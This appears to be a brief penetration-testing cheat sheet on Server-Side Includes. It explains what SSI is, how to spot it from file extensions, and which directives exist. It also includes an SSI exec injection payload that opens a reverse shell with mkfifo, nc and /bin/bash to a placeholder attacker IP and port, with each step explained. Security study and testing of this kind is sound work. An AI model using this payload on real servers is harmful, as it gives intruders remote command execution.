SSI

Server-Side Includes.

Server-side includes is a technology used by web applications to create dynamic content on HTML pages before loading or during the rendering process by evaluating SSI directives. SSI directives are not always present in modern web servers and are not a standard feature of all servers. There are web servers that support SSI directives and others that do not. However, many popular web servers such as Apache, Nginx and Microsoft IIS support SSI directives and provide features to enable and configure them. The use of SSI on a web application can be identified by checking extensions such as .shtml, .shtm, or .stm. That said, there are non-default server configurations that may allow other extensions (such as .html) to process SSI directives.

SSI directives are enclosed between the tags .

Date

Modification date of a file

CGI Program results

Including a footer

Executing commands

Setting variables

Including virtual files (same directory)

Including files (same directory)

Print all variables

<!--#echo var="DATE_LOCAL" -->
<!--#flastmod file="index.html" -->
<!--#include virtual="/cgi-bin/counter.pl" -->
<!--#include virtual="/footer.html" -->
<!--#exec cmd="ls" -->
<!--#set var="name" value="Rich" -->
<!--#include virtual="file_to_include.html" -->
<!--#include file="file_to_include.html" -->
<!--#printenv -->

Reverse Shell

<!--#exec cmd="mkfifo /tmp/foo;nc <MY_IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

mkfifo /tmp/foo: Create a FIFO special file in /tmp/foo
nc <IP> <PORT> 0</tmp/foo: Connect to the my machine and redirect the standard input descriptor
| bin/bash 1>/tmp/foo: Execute /bin/bash redirecting the standard output descriptor to /tmp/foo
rm /tmp/foo: Cleanup the FIFO file

Last updated 2 months ago